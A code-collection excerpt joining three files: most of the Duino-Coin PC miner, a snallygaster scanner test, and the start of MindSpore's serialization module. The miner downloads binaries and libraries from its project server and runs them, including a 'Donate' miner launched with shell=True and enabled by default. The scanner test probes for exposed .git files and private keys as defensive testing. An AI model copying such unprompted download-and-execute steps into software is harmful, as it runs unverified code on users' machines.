' ' * (50-done),
str(round(os.path.getsize(file_path) / 1024 / 1024, 2)) + " MB ",
str((dl // (time() - start)) // 1024) + " KB/s")) # ProgressBar
sys.stdout.flush()
f.write(chunk)
f.flush()
os.fsync(f.fileno())
print("\nDownload complete!")
if not running_script:
print("Unpacking...")
with zipfile.ZipFile(file_path, 'r') as zip_ref: # Unzip the file
for file in zip_ref.infolist():
if "PC_Miner" in file.filename:
if sys.platform == "win32":
file.filename = "PC_Miner_"+data["tag_name"]+".exe" # Rename the file
else:
file.filename = "PC_Miner_"+data["tag_name"]
zip_ref.extract(file, ".")
print("Unpacking complete!")
os.remove(file_path) # Delete the zip file
os.rmdir(Settings.TEMP_FOLDER) # Delete the temp folder
if sys.platform == "win32":
os.startfile(os.getcwd() + "\\PC_Miner_"+data["tag_name"]+".exe") # Start the miner
else: # os.startfile is only for windows
os.system(os.getcwd() + "/PC_Miner_"+data["tag_name"])
else:
if sys.platform == "win32":
os.system(file_path)
else:
os.system("python3 " + file_path)
sys.exit() # Exit the program
else: # HTTP status code 4XX/5XX
print("Download failed: status code {}\n{}".format(r.status_code, r.text))
else:
print("Update aborted!")
else:
print("The Miner is up to date")
except Exception as e:
print(e)
sys.exit()
class Algorithms:
"""
Class containing algorithms used by the miner
For more info about the implementation refer to the Duino whitepaper:
https://github.com/revoxhere/duino-coin/blob/gh-pages/assets/whitepaper.pdf
"""
def DUCOS1(last_h: str, exp_h: str, diff: int, eff: int):
try:
import libducohasher
fasthash_supported = True
except:
fasthash_supported = False
if fasthash_supported:
time_start = time()
hasher = libducohasher.DUCOHasher(bytes(last_h, encoding='ascii'))
nonce = hasher.DUCOS1(
bytes(bytearray.fromhex(exp_h)), diff, int(eff))
time_elapsed = time() - time_start
hashrate = nonce / time_elapsed
return [nonce, hashrate]
else:
time_start = time()
base_hash = sha1(last_h.encode('ascii'))
for nonce in range(100 * diff + 1):
temp_h = base_hash.copy()
temp_h.update(str(nonce).encode('ascii'))
d_res = temp_h.hexdigest()
if eff != 0:
if nonce % 5000 == 0:
sleep(eff / 100)
if d_res == exp_h:
time_elapsed = time() - time_start
hashrate = nonce / time_elapsed
return [nonce, hashrate]
return [0, 0]
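# Illustrative helper (not part of the miner): the pure-Python fallback above
# looks for a nonce such that sha1(last_h + str(nonce)) equals the expected
# hash, so a found share can be re-checked like this.
def verify_ducos1_share(last_h: str, exp_h: str, nonce: int) -> bool:
    return sha1((last_h + str(nonce)).encode('ascii')).hexdigest() == exp_h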
class Client:
"""
Class helping to organize socket connections
"""
def connect(pool: tuple):
global s
s = socket()
s.settimeout(Settings.SOC_TIMEOUT)
s.connect((pool))
def send(msg: str):
sent = s.sendall(str(msg).encode(Settings.ENCODING))
return sent
def recv(limit: int = 128):
data = s.recv(limit).decode(Settings.ENCODING).rstrip("\n")
return data
def fetch_pool(retry_count=1):
"""
Fetches the best pool from the /getPool API endpoint
"""
while True:
if retry_count > 60:
retry_count = 60
try:
pretty_print(get_string("connection_search"),
"info", "net0")
response = requests.get(
"https://server.duinocoin.com/getPool",
timeout=10).json()
if response["success"] == True:
pretty_print(get_string("connecting_node")
+ response["name"],
"info", "net0")
NODE_ADDRESS = response["ip"]
NODE_PORT = response["port"]
return (NODE_ADDRESS, NODE_PORT)
elif "message" in response:
pretty_print(f"Warning: {response['message']}")
+ (f", retrying in {retry_count*2}s",
"warning", "net0")
else:
raise Exception("no response - IP ban or connection error")
except Exception as e:
if "Expecting value" in str(e):
pretty_print(get_string("node_picker_unavailable")
+ f"{retry_count*2}s {Style.RESET_ALL}({e})",
"warning", "net0")
else:
pretty_print(get_string("node_picker_error")
+ f"{retry_count*2}s {Style.RESET_ALL}({e})",
"error", "net0")
sleep(retry_count * 2)
retry_count += 1
class Donate:
def load(donation_level):
if donation_level > 0:
if os.name == 'nt':
if not Path(
f"{Settings.DATA_DIR}/Donate.exe").is_file():
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableWindows.exe')
r = requests.get(url, timeout=15)
with open(f"{Settings.DATA_DIR}/Donate.exe",
'wb') as f:
f.write(r.content)
return
elif os.name == "posix":
if osprocessor() == "aarch64":
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableAARCH64')
elif osprocessor() == "armv7l":
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableAARCH32')
elif osprocessor() == "x86_64":
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableLinux')
else:
pretty_print(
"Donate executable unavailable: "
+ f"{os.name} {osprocessor()}")
return
if not Path(
f"{Settings.DATA_DIR}/Donate").is_file():
r = requests.get(url, timeout=15)
with open(f"{Settings.DATA_DIR}/Donate",
"wb") as f:
f.write(r.content)
return
def start(donation_level):
if os.name == 'nt':
cmd = (f'cd "{Settings.DATA_DIR}" & Donate.exe '
+ '-o stratum+tcp://xmg.minerclaim.net:3333 '
+ f'-u revox.donate -p x -s 4 -e {donation_level*5}')
elif os.name == 'posix':
cmd = (f'cd "{Settings.DATA_DIR}" && chmod +x Donate '
+ '&& nice -20 ./Donate -o '
+ 'stratum+tcp://xmg.minerclaim.net:3333 '
+ f'-u revox.donate -p x -s 4 -e {donation_level*5}')
if donation_level <= 0:
pretty_print(
Fore.YELLOW + get_string('free_network_warning').lstrip()
+ get_string('donate_warning').replace("\n", "\n\t\t")
+ Fore.GREEN + 'https://duinocoin.com/donate'
+ Fore.YELLOW + get_string('learn_more_donate'),
'warning', 'sys0')
sleep(5)
if donation_level > 0:
donateExecutable = Popen(cmd, shell=True, stderr=DEVNULL)
pretty_print(get_string('thanks_donation').replace("\n", "\n\t\t"),
'error', 'sys0')
def get_prefix(symbol: str,
val: float,
accuracy: int):
"""
H/s, 1000 => 1 kH/s
"""
if val >= 1_000_000_000_000: # Really?
val = str(round((val / 1_000_000_000_000), accuracy)) + " T"
elif val >= 1_000_000_000:
val = str(round((val / 1_000_000_000), accuracy)) + " G"
elif val >= 1_000_000:
val = str(round((val / 1_000_000), accuracy)) + " M"
elif val >= 1_000:
val = str(round((val / 1_000))) + " k"
else:
val = str(round(val)) + " "
return val + symbol
def periodic_report(start_time, end_time, shares,
blocks, hashrate, uptime):
"""
    Displays nicely formatted uptime stats
"""
seconds = round(end_time - start_time)
pretty_print(get_string("periodic_mining_report")
+ Fore.RESET + Style.NORMAL
+ get_string("report_period")
+ str(seconds) + get_string("report_time")
+ get_string("report_body1")
+ str(shares) + get_string("report_body2")
+ str(round(shares/seconds, 1))
+ get_string("report_body3")
+ get_string("report_body7")
+ str(blocks)
+ get_string("report_body4")
+ str(get_prefix("H/s", hashrate, 2))
+ get_string("report_body5")
+ str(int(hashrate*seconds))
+ get_string("report_body6")
+ get_string("total_mining_time")
+ str(uptime), "success")
def calculate_uptime(start_time):
"""
Returns seconds, minutes or hours passed since timestamp
"""
uptime = time() - start_time
if uptime >= 7200: # 2 hours, plural
return str(uptime // 3600) + get_string('uptime_hours')
elif uptime >= 3600: # 1 hour, not plural
return str(uptime // 3600) + get_string('uptime_hour')
elif uptime >= 120: # 2 minutes, plural
return str(uptime // 60) + get_string('uptime_minutes')
elif uptime >= 60: # 1 minute, not plural
return str(uptime // 60) + get_string('uptime_minute')
else: # less than 1 minute
return str(round(uptime)) + get_string('uptime_seconds')
def pretty_print(msg: str = None,
state: str = "success",
sender: str = "sys0"):
global printlock
"""
Produces nicely formatted CLI output for messages:
HH:MM:S |sender| msg
"""
if sender.startswith("net"):
bg_color = Back.BLUE
elif sender.startswith("cpu"):
bg_color = Back.YELLOW
elif sender.startswith("sys"):
bg_color = Back.GREEN
if state == "success":
fg_color = Fore.GREEN
elif state == "info":
fg_color = Fore.BLUE
elif state == "error":
fg_color = Fore.RED
else:
fg_color = Fore.YELLOW
with printlock:
print(Fore.WHITE + datetime.now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT + bg_color + " " + sender + " "
+ Back.RESET + " " + fg_color + msg.strip())
def share_print(id, type,
accept, reject,
total_hashrate,
computetime, diff, ping,
back_color, reject_cause=None):
"""
Produces nicely formatted CLI output for shares:
HH:MM:S |cpuN| ⛏ Accepted 0/0 (100%) ∙ 0.0s ∙ 0 kH/s ⚙ diff 0 k ∙ ping 0ms
"""
total_hashrate = get_prefix("H/s", total_hashrate, 2)
diff = get_prefix("", int(diff), 0)
if type == "accept":
share_str = get_string("accepted")
fg_color = Fore.GREEN
elif type == "block":
share_str = get_string("block_found")
fg_color = Fore.YELLOW
else:
share_str = get_string("rejected")
if reject_cause:
share_str += f"{Style.NORMAL}({reject_cause}) "
fg_color = Fore.RED
with printlock:
print(Fore.WHITE + datetime.now().strftime(Style.DIM + "%H:%M:%S ")
+ Fore.WHITE + Style.BRIGHT + back_color + Fore.RESET
+ f" cpu{id} " + Back.RESET + fg_color + Settings.PICK
+ share_str + Fore.RESET + f"{accept}/{(accept + reject)}"
+ Fore.YELLOW
+ f" ({(round(accept / (accept + reject) * 100))}%)"
+ Style.NORMAL + Fore.RESET
+ f" ∙ {('%04.1f' % float(computetime))}s"
+ Style.NORMAL + " ∙ " + Fore.BLUE + Style.BRIGHT
+ str(total_hashrate) + Fore.RESET + Style.NORMAL
+ Settings.COG + f" diff {diff} ∙ " + Fore.CYAN
+ f"ping {(int(ping))}ms")
def get_string(string_name):
"""
Gets a string from the language file
"""
if string_name in lang_file[lang]:
return lang_file[lang][string_name]
elif string_name in lang_file["english"]:
return lang_file["english"][string_name]
else:
return string_name
def check_mining_key(user_settings):
if user_settings["mining_key"] != "None":
key = b64.b64decode(user_settings["mining_key"]).decode('utf-8')
else:
key = ''
response = requests.get(
"https://server.duinocoin.com/mining_key"
+ "?u=" + user_settings["username"]
+ "&k=" + key,
timeout=10
).json()
if response["success"] and not response["has_key"]: # if the user doesn't have a mining key
user_settings["mining_key"] = "None"
configparser["PC Miner"] = user_settings
with open(Settings.DATA_DIR + Settings.SETTINGS_FILE,
"w") as configfile:
configparser.write(configfile)
print(Style.RESET_ALL + get_string("config_saved"))
sleep(1.5)
return
if not response["success"]:
if user_settings["mining_key"] == "None":
pretty_print(
get_string("mining_key_required"),
"warning"
)
mining_key = input("Enter your mining key: ")
user_settings["mining_key"] = b64.b64encode(mining_key.encode("utf-8")).decode('utf-8')
configparser["PC Miner"] = user_settings
with open(Settings.DATA_DIR + Settings.SETTINGS_FILE,
"w") as configfile:
configparser.write(configfile)
print(Style.RESET_ALL + get_string("config_saved"))
sleep(1.5)
check_mining_key(user_settings)
else:
pretty_print(
get_string("invalid_mining_key"),
"error"
)
            retry = input("Do you want to retry? (y/n): ")
if retry == "y" or retry == "Y":
mining_key = input("Enter your mining key: ")
user_settings["mining_key"] = b64.b64encode(mining_key.encode("utf-8")).decode('utf-8')
configparser["PC Miner"] = user_settings
with open(Settings.DATA_DIR + Settings.SETTINGS_FILE,
"w") as configfile:
configparser.write(configfile)
print(Style.RESET_ALL + get_string("config_saved"))
sleep(1.5)
check_mining_key(user_settings)
else:
return
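# The mining key is stored base64-encoded in the settings file and decoded
# again before it is sent to the server. A minimal round-trip sketch (the key
# value is a made-up placeholder):
#   encoded = b64.b64encode("my_key".encode("utf-8")).decode("utf-8")
#   decoded = b64.b64decode(encoded).decode("utf-8")  # -> "my_key"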
class Miner:
def greeting():
diff_str = get_string("net_diff_short")
if user_settings["start_diff"] == "LOW":
diff_str = get_string("low_diff_short")
elif user_settings["start_diff"] == "MEDIUM":
diff_str = get_string("medium_diff_short")
current_hour = strptime(ctime(time())).tm_hour
greeting = get_string("greeting_back")
if current_hour < 12:
greeting = get_string("greeting_morning")
elif current_hour == 12:
greeting = get_string("greeting_noon")
elif current_hour > 12 and current_hour < 18:
greeting = get_string("greeting_afternoon")
elif current_hour >= 18:
greeting = get_string("greeting_evening")
print("\n" + Style.DIM + Fore.YELLOW + Settings.BLOCK + Fore.YELLOW
+ Style.BRIGHT + get_string("banner") + Style.RESET_ALL
+ Fore.MAGENTA + " (" + str(Settings.VER) + ") "
+ Fore.RESET + "2019-2022")
print(Style.DIM + Fore.YELLOW + Settings.BLOCK + Style.NORMAL
+ Fore.YELLOW + "https://github.com/revoxhere/duino-coin")
if lang != "english":
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET
+ get_string("translation") + Fore.YELLOW
+ get_string("translation_autor"))
try:
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + "CPU: " + Style.BRIGHT
+ Fore.YELLOW + str(user_settings["threads"])
+ "x " + str(cpu["brand_raw"]))
except:
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + "CPU: " + Style.BRIGHT
+ Fore.YELLOW + str(user_settings["threads"])
+ "x threads")
if os.name == "nt" or os.name == "posix":
print(Style.DIM + Fore.YELLOW
+ Settings.BLOCK + Style.NORMAL + Fore.RESET
+ get_string("donation_level") + Style.BRIGHT
+ Fore.YELLOW + str(user_settings["donate"]))
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + get_string("algorithm")
+ Style.BRIGHT + Fore.YELLOW + user_settings["algorithm"]
+ Settings.COG + " " + diff_str)
if user_settings["identifier"] != "None":
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + get_string("rig_identifier")
+ Style.BRIGHT + Fore.YELLOW + user_settings["identifier"])
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + str(greeting)
+ ", " + Style.BRIGHT + Fore.YELLOW
+ str(user_settings["username"]) + "!\n")
def preload():
"""
Creates needed directories and files for the miner
"""
global lang_file
global lang
if not Path(Settings.DATA_DIR).is_dir():
mkdir(Settings.DATA_DIR)
if not Path(Settings.DATA_DIR + Settings.TRANSLATIONS_FILE).is_file():
with open(Settings.DATA_DIR + Settings.TRANSLATIONS_FILE,
"wb") as f:
f.write(requests.get(Settings.TRANSLATIONS,
timeout=10).content)
with open(Settings.DATA_DIR + Settings.TRANSLATIONS_FILE, "r",
encoding=Settings.ENCODING) as file:
lang_file = json.load(file)
try:
if not Path(Settings.DATA_DIR + Settings.SETTINGS_FILE).is_file():
locale = getdefaultlocale()[0]
if locale.startswith("es"):
lang = "spanish"
elif locale.startswith("pl"):
lang = "polish"
elif locale.startswith("fr"):
lang = "french"
elif locale.startswith("fa"):
lang = "farsi"
elif locale.startswith("mt"):
lang = "maltese"
elif locale.startswith("ru"):
lang = "russian"
elif locale.startswith("uk"):
lang = "ukrainian"
elif locale.startswith("de"):
lang = "german"
elif locale.startswith("tr"):
lang = "turkish"
elif locale.startswith("pr"):
lang = "portuguese"
elif locale.startswith("it"):
lang = "italian"
elif locale.startswith("sk"):
lang = "slovak"
elif locale.startswith("zh"):
lang = "chinese_simplified"
elif locale.startswith("th"):
lang = "thai"
elif locale.startswith("ko"):
lang = "korean"
elif locale.startswith("id"):
lang = "indonesian"
elif locale.startswith("cz"):
lang = "czech"
else:
lang = "english"
else:
try:
configparser.read(Settings.DATA_DIR
+ Settings.SETTINGS_FILE)
lang = configparser["PC Miner"]["language"]
except Exception:
lang = "english"
except Exception as e:
print("Error with lang file, falling back to english: " + str(e))
lang = "english"
def load_cfg():
"""
Loads miner settings file or starts the config tool
"""
if not Path(Settings.DATA_DIR + Settings.SETTINGS_FILE).is_file():
print(get_string("basic_config_tool")
+ Settings.DATA_DIR
+ get_string("edit_config_file_warning")
+ "\n"
+ get_string("dont_have_account")
+ Fore.YELLOW
+ get_string("wallet")
+ Fore.RESET
+ get_string("register_warning"))
username = input(get_string("ask_username") + Style.BRIGHT)
if not username:
username = choice(["revox", "Bilaboz", "JoyBed", "Connor2"])
mining_key = input(Style.RESET_ALL + get_string("ask_mining_key") + Style.BRIGHT)
if not mining_key:
mining_key = "None"
else:
mining_key = b64.b64encode(mining_key.encode("utf-8")).decode('utf-8')
algorithm = "DUCO-S1"
intensity = sub(r"\D", "",
input(Style.NORMAL +
get_string("ask_intensity") +
Style.BRIGHT))
if not intensity:
intensity = 95
elif float(intensity) > 100:
intensity = 100
elif float(intensity) < 1:
intensity = 1
threads = sub(r"\D", "",
input(Style.NORMAL + get_string("ask_threads")
+ str(cpu_count()) + "): " + Style.BRIGHT))
if not threads:
threads = cpu_count()
if int(threads) > 8:
threads = 8
pretty_print(
Style.BRIGHT
+ get_string("max_threads_notice"))
elif int(threads) < 1:
threads = 1
print(Style.BRIGHT
+ "1" + Style.NORMAL + " - " + get_string("low_diff")
+ "\n" + Style.BRIGHT
+ "2" + Style.NORMAL + " - " + get_string("medium_diff")
+ "\n" + Style.BRIGHT
+ "3" + Style.NORMAL + " - " + get_string("net_diff"))
start_diff = sub(r"\D", "",
input(Style.NORMAL + get_string("ask_difficulty")
+ Style.BRIGHT))
if start_diff == "1":
start_diff = "LOW"
elif start_diff == "3":
start_diff = "NET"
else:
start_diff = "MEDIUM"
rig_id = input(Style.NORMAL + get_string("ask_rig_identifier")
+ Style.BRIGHT)
if rig_id.lower() == "y":
rig_id = str(input(Style.NORMAL + get_string("ask_rig_name")
+ Style.BRIGHT))
else:
rig_id = "None"
donation_level = '0'
if os.name == 'nt' or os.name == 'posix':
donation_level = input(Style.NORMAL
+ get_string('ask_donation_level')
+ Style.BRIGHT)
donation_level = sub(r'\D', '', donation_level)
if donation_level == '':
donation_level = 1
if float(donation_level) > int(5):
donation_level = 5
if float(donation_level) < int(0):
donation_level = 0
configparser["PC Miner"] = {
"username": username,
"mining_key": mining_key,
"intensity": intensity,
"threads": threads,
"start_diff": start_diff,
"donate": int(donation_level),
"identifier": rig_id,
"algorithm": algorithm,
"language": lang,
"soc_timeout": Settings.SOC_TIMEOUT,
"report_sec": Settings.REPORT_TIME,
"discord_rp": "y"}
with open(Settings.DATA_DIR + Settings.SETTINGS_FILE,
"w") as configfile:
configparser.write(configfile)
print(Style.RESET_ALL + get_string("config_saved"))
configparser.read(Settings.DATA_DIR
+ Settings.SETTINGS_FILE)
return configparser["PC Miner"]
def m_connect(id, pool):
retry_count = 0
while True:
try:
if retry_count > 3:
pool = Client.fetch_pool()
retry_count = 0
socket_connection = Client.connect(pool)
POOL_VER = Client.recv(5)
if id == 0:
Client.send("MOTD")
motd = Client.recv(512).replace("\n", "\n\t\t")
pretty_print("MOTD: " + Fore.RESET + Style.NORMAL
+ str(motd), "success", "net" + str(id))
if float(POOL_VER) <= Settings.VER:
pretty_print(get_string("connected") + Fore.RESET
+ Style.NORMAL +
get_string("connected_server")
+ str(POOL_VER) + ", " + pool[0] + ":"
+ str(pool[1]) + ")", "success",
"net" + str(id))
else:
pretty_print(get_string("outdated_miner")
+ str(Settings.VER) + ") -"
+ get_string("server_is_on_version")
+ str(POOL_VER) + Style.NORMAL
+ Fore.RESET +
get_string("update_warning"),
"warning", "net" + str(id))
sleep(5)
break
except Exception as e:
pretty_print(get_string('connecting_error')
+ Style.NORMAL + f' (connection err: {e})',
'error', 'net0')
retry_count += 1
sleep(10)
def mine(id: int, user_settings: list,
blocks: int, pool: tuple,
accept: int, reject: int,
hashrate: list,
single_miner_id: str):
"""
Main section that executes the functionalities from the sections above.
"""
using_algo = get_string("using_algo")
pretty_print(get_string("mining_thread") + str(id)
+ get_string("mining_thread_starting")
+ Style.NORMAL + Fore.RESET + using_algo + Fore.YELLOW
+ str(user_settings["intensity"])
+ "% " + get_string("efficiency"),
"success", "sys"+str(id))
last_report = time()
r_shares, last_shares = 0, 0
while True:
try:
Miner.m_connect(id, pool)
while True:
try:
while True:
if user_settings["mining_key"] != "None":
key = b64.b64decode(user_settings["mining_key"]).decode('utf-8')
else:
key = user_settings["mining_key"]
job_req = "JOB"
Client.send(job_req
+ Settings.SEPARATOR
+ str(user_settings["username"])
+ Settings.SEPARATOR
+ str(user_settings["start_diff"])
+ Settings.SEPARATOR
+ str(key)
)
job = Client.recv().split(Settings.SEPARATOR)
if len(job) == 3:
break
else:
pretty_print(
"Node message: " + str(job[1]),
"warning")
sleep(3)
while True:
time_start = time()
back_color = Back.YELLOW
eff = 0
eff_setting = int(user_settings["intensity"])
if 99 > eff_setting >= 90:
eff = 0.005
elif 90 > eff_setting >= 70:
eff = 0.1
elif 70 > eff_setting >= 50:
eff = 0.8
elif 50 > eff_setting >= 30:
eff = 1.8
elif 30 > eff_setting >= 1:
eff = 3
result = Algorithms.DUCOS1(
job[0], job[1], int(job[2]), eff)
computetime = time() - time_start
hashrate[id] = result[1]
total_hashrate = sum(hashrate.values())
while True:
Client.send(f"{result[0]}"
+ Settings.SEPARATOR
+ f"{result[1]}"
+ Settings.SEPARATOR
+ "Official PC Miner"
+ f" {Settings.VER}"
+ Settings.SEPARATOR
+ f"{user_settings['identifier']}"
+ Settings.SEPARATOR
+ Settings.SEPARATOR
+ f"{single_miner_id}")
time_start = time()
feedback = Client.recv(
).split(Settings.SEPARATOR)
ping = (time() - time_start) * 1000
if feedback[0] == "GOOD":
accept.value += 1
share_print(id, "accept",
accept.value, reject.value,
total_hashrate,
computetime, job[2], ping,
back_color)
elif feedback[0] == "BLOCK":
accept.value += 1
blocks.value += 1
share_print(id, "block",
accept.value, reject.value,
total_hashrate,
computetime, job[2], ping,
back_color)
elif feedback[0] == "BAD":
reject.value += 1
share_print(id, "reject",
accept.value, reject.value,
total_hashrate,
computetime, job[2], ping,
back_color, feedback[1])
if id == 0:
end_time = time()
elapsed_time = end_time - last_report
if elapsed_time >= int(user_settings["report_sec"]):
r_shares = accept.value - last_shares
uptime = calculate_uptime(
mining_start_time)
periodic_report(last_report, end_time,
r_shares, blocks.value,
sum(hashrate.values()),
uptime)
last_report = time()
last_shares = accept.value
break
break
except Exception as e:
pretty_print(get_string("error_while_mining")
+ " " + str(e), "error", "net" + str(id))
sleep(5)
break
except Exception as e:
pretty_print(get_string("error_while_mining")
+ " " + str(e), "error", "net" + str(id))
class Discord_rp:
def connect():
global RPC
try:
RPC = Presence(808045598447632384)
RPC.connect()
Thread(target=Discord_rp.update).start()
except Exception as e:
pretty_print(get_string("Error launching Discord RPC thread: " + str(e)))
def update():
while True:
try:
total_hashrate = get_prefix("H/s", sum(hashrate.values()), 2)
RPC.update(details="Hashrate: " + str(total_hashrate),
start=mining_start_time,
state=str(accept.value) + "/"
+ str(reject.value + accept.value)
+ " accepted shares",
large_image="ducol",
large_text="Duino-Coin, "
+ "a coin that can be mined with almost everything"
+ ", including AVR boards",
buttons=[{"label": "Visit duinocoin.com",
"url": "https://duinocoin.com"},
{"label": "Join the Discord",
"url": "https://discord.gg/k48Ht5y"}])
except Exception as e:
pretty_print(get_string("Error updating Discord RPC thread: " + str(e)))
sleep(15)
class Fasthash:
def init():
try:
"""
            Check whether the libducohash fasthash module is available
to speed up the DUCOS1 work, created by @HGEpro
"""
import libducohasher
pretty_print(get_string("fasthash_available"), "info")
except Exception as e:
if int(python_version_tuple()[1]) <= 6:
pretty_print(
(f"Your Python version is too old ({python_version()}).\n"
+ "Fasthash accelerations and other features may not work"
+ " on your outdated installation.\n"
+ "We suggest updating your python to version 3.7 or higher."
).replace("\n", "\n\t\t"), 'warning', 'sys0')
else:
pretty_print(
("Fasthash accelerations are not available for your OS.\n"
+ "If you wish to compile them for your system, visit:\n"
+ "https://github.com/revoxhere/duino-coin/wiki/"
+ "How-to-compile-fasthash-accelerations\n"
+ f"(Libducohash couldn't be loaded: {str(e)})"
).replace("\n", "\n\t\t"), 'warning', 'sys0')
sleep(15)
def load():
if os.name == 'nt':
if not Path("libducohasher.pyd").is_file():
pretty_print(get_string("fasthash_download"), "info")
url = ('https://server.duinocoin.com/'
+ 'fasthash/libducohashWindows.pyd')
r = requests.get(url, timeout=10)
with open(f"libducohasher.pyd", 'wb') as f:
f.write(r.content)
return
elif os.name == "posix":
if osprocessor() == "aarch64":
url = ('https://server.duinocoin.com/'
+ 'fasthash/libducohashPi4.so')
elif osprocessor() == "armv7l":
url = ('https://server.duinocoin.com/'
+ 'fasthash/libducohashPi4_32.so')
elif osprocessor() == "armv6l":
url = ('https://server.duinocoin.com/'
+ 'fasthash/libducohashPiZero.so')
elif osprocessor() == "x86_64":
url = ('https://server.duinocoin.com/'
+ 'fasthash/libducohashLinux.so')
else:
pretty_print(
("Fasthash accelerations are not available for your OS.\n"
+ "If you wish to compile them for your system, visit:\n"
+ "https://github.com/revoxhere/duino-coin/wiki/"
+ "How-to-compile-fasthash-accelerations\n"
+ f"(Invalid processor architecture: {osprocessor()})"
).replace("\n", "\n\t\t"), 'warning', 'sys0')
sleep(15)
return
if not Path("libducohasher.so").is_file():
pretty_print(get_string("fasthash_download"), "info")
r = requests.get(url, timeout=10)
with open("libducohasher.so", "wb") as f:
f.write(r.content)
return
else:
pretty_print(
("Fasthash accelerations are not available for your OS.\n"
+ "If you wish to compile them for your system, visit:\n"
+ "https://github.com/revoxhere/duino-coin/wiki/"
+ "How-to-compile-fasthash-accelerations\n"
+ f"(Invalid OS: {os.name})"
).replace("\n", "\n\t\t"), 'warning', 'sys0')
sleep(15)
return
Miner.preload()
p_list = []
mining_start_time = time()
if __name__ == "__main__":
from multiprocessing import freeze_support
freeze_support()
signal(SIGINT, handler)
if sys.platform == "win32":
os.system('') # Enable VT100 Escape Sequence for WINDOWS 10 Ver. 1607
check_updates()
cpu = cpuinfo.get_cpu_info()
accept = Manager().Value("i", 0)
reject = Manager().Value("i", 0)
blocks = Manager().Value("i", 0)
hashrate = Manager().dict()
user_settings = Miner.load_cfg()
Miner.greeting()
Fasthash.load()
Fasthash.init()
try:
check_mining_key(user_settings)
except Exception as e:
print("Error checking mining key:", e)
Donate.load(int(user_settings["donate"]))
Donate.start(int(user_settings["donate"]))
"""
Generate a random number that's used to
group miners with many threads in the wallet
"""
single_miner_id = randint(0, 2811)
threads = int(user_settings["threads"])
if threads > 12:
threads = 12
pretty_print(Style.BRIGHT
+ get_string("max_threads_notice"))
fastest_pool = Client.fetch_pool()
for i in range(threads):
p = Process(target=Miner.mine,
args=[i, user_settings, blocks,
fastest_pool, accept, reject,
hashrate, single_miner_id])
p_list.append(p)
p.start()
sleep(0.05)
if user_settings["discord_rp"] == 'y':
Discord_rp.connect()
for p in p_list:
p.join()
|
test_scan_testdata.py
|
import unittest
import subprocess
import os
import tempfile
import http.server
import ssl
import threading
TESTDATA_REPO = "https://github.com/hannob/snallygaster-testdata"
TESTDATA = {"backup_archive": "[backup_archive] https://localhost:4443/backup.zip",
"git_dir": "[git_dir] https://localhost:4443/.git/config",
"deadjoe": "[deadjoe] https://localhost:4443/DEADJOE",
"coredump": "[coredump] https://localhost:4443/core",
"backupfiles": "[backupfiles] https://localhost:4443/index.php~",
"ds_store": "[ds_store] https://localhost:4443/.DS_Store",
"privatekey": "[privatekey_pkcs8] https://localhost:4443/server.key",
}
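# These checks only run when the RUN_ONLINETESTS environment variable is set;
# TESTDATA_REPOSITORY can point at a local clone to skip the git clone step.
# A minimal invocation sketch:
#   RUN_ONLINETESTS=1 python -m unittest test_scan_testdata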
class TestScanTestdata(unittest.TestCase):
@unittest.skipUnless(os.environ.get("RUN_ONLINETESTS"),
"Not running online tests")
def test_scan_testdata(self):
tmp = tempfile.mkdtemp(prefix="testdata")
if os.environ.get("TESTDATA_REPOSITORY"):
os.symlink(os.environ.get("TESTDATA_REPOSITORY"),
tmp + "/testdata")
else:
subprocess.run(["git", "clone", "--depth=1",
TESTDATA_REPO,
tmp + "/testdata"],
check=True)
olddir = os.getcwd()
os.chdir(tmp + "/testdata")
httpd = http.server.HTTPServer(('localhost', 4443), http.server.SimpleHTTPRequestHandler)
context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
context.load_cert_chain(certfile=tmp + '/testdata/testserver.pem')
httpd.socket = context.wrap_socket(httpd.socket, server_side=True)
t = threading.Thread(target=httpd.serve_forever)
t.daemon = True
t.start()
for test, expected in TESTDATA.items():
testrun = subprocess.run([olddir + "/snallygaster", "-t", test, "localhost:4443",
"--nowww", "--nohttp"],
stdout=subprocess.PIPE, check=True)
output = testrun.stdout.decode("utf-8").rstrip()
self.assertEqual(output, expected)
if __name__ == '__main__':
unittest.main()
|
serialization.py
|
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Model and parameters serialization."""
import os
import stat
import math
from threading import Thread, Lock
import numpy as np
import mindspore.nn as nn
from mindspore import log as logger
from mindspore.train.checkpoint_pb2 import Checkpoint
from mindspore.train.print_pb2 import Print
from mindspore.train.node_strategy_pb2 import ParallelStrategyMap
from mindspore.common.tensor import Tensor
from mindspore.common.initializer import initializer
from mindspore.common.parameter import Parameter
from mindspore.common.api import _executor
from mindspore.common import dtype as mstype
from mindspore._checkparam import check_input_data
from mindspore.train.quant import quant
import mindspore.context as context
from .._checkparam import Validator
__all__ = ["save_checkpoint", "load_checkpoint", "load_param_into_net", "export", "parse_print",
"build_searched_strategy", "merge_sliced_parameter"]
tensor_to_ms_type = {"Int8": mstype.int8, "Uint8": mstype.uint8, "Int16": mstype.int16, "Uint16": mstype.uint16,
"Int32": mstype.int32, "Uint32": mstype.uint32, "Int64": mstype.int64, "Uint64": mstype.uint64,
"Float16": mstype.float16, "Float32": mstype.float32, "Float64": mstype.float64,
"Bool": mstype.bool_}
tensor_to_np_type = {"Int8": np.int8, "Uint8": np.uint8, "Int16": np.int16, "Uint16": np.uint16,
"Int32": np.int32, "Uint32": np.uint32, "Int64": np.int64, "Uint64": np.uint64,
